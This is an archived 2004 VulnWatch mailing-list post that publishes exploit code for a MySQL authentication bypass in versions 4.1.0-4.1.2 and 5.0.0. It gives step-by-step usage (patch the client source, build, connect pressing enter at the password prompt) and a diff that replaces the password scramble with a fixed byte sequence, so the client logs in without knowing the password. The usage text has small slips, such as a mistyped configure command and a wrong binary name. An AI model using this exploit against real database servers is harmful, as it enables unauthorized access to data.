[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[VulnWatch] MySQL authentication bypass exploit code.
- To: vulnwatch@xxxxxxxxxxxxx
- Subject: [VulnWatch] MySQL authentication bypass exploit code.
- From: bambam@xxxxxxxxxxxxxxxxxxxxx
- Date: Thu, 8 Jul 2004 09:42:45 +0100 (BST)
Background
**********
Chris Anley (chris@xxxxxxxxxxxxxxx) discovered an
authentication bypass vulnerability in versions 4.1.0 -
4.1.2 and 5.0.0 of MySQL. His paper of Monday 5th July
entitled "Hackproofing MySQL" included details of the
vulnerability, along with other information on MySQL
security issues, but included no exploit code.
In his paper he states that:
"This bug is relatively easy to exploit, although it is
necessary to write a custom MySQL client in order to do so."
This seemed a little strange to me, as I just altered
the mysql client's own source to include the attack.
Diffs are attached against version 5.0.0-alpha source
distribution. (Since this is the distibution for "previewing
and testing new features" ;-)
Mitigating Factors
******************
Chris pointed out the mitigating factors of this attack in
his paper, but they are worth re-iterating:
1) The attacker must be able to connect to the mysql daemon.
2) The attacker must know a valid username for the mysql database.
3) The attacker must be connecting from a host valid for
that username (localhost by default in the case of the
'root' mysql user).
Usage
*****
Download and Unpack the 5.0.0-alpha source from the mysql
website, then patch the file sql-common/client.c with:
sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
sql-common/ $ cd ..
mysql-5.0.0-alpha/ # ./confiugure
mysql-5.0.0-alpha/ # make
Then simply use the resultant client binary (mysql) as you
would normally, with total disregard to the password you
specify:
mysql-5.0.0-alpha/ $ ./client/mysqld -h hostname -u username
Just press enter at the password prompt - and if the server
is vulnerable you should be logged in.
Tested against server version 5.0.0-alpha, but should work
against the other vulnerable versions since the server code
is the same :-)
Greetings
*********
to everyone in the uk scene, especially the whole brum crew
(past and present), all the sheffield mormons (i'm doing
this for satan), and to all those who don't believe in
change for the better - may you be proven wrong in time.
bambam
--
Cry 'Socket(),' and let slip the packets of war;
1941,1956c1941,1942
< if (passwd[0])
< {
< if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
< {
< *end++= SCRAMBLE_LENGTH;
< scramble(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH;
< }
< else
< {
< scramble_323(end, mysql->scramble, passwd);
< end+= SCRAMBLE_LENGTH_323 + 1;
< }
< }
< else
< *end++= '\0'; /* empty password */
---
> sprintf(end,"\x14\x00");
> end+=2;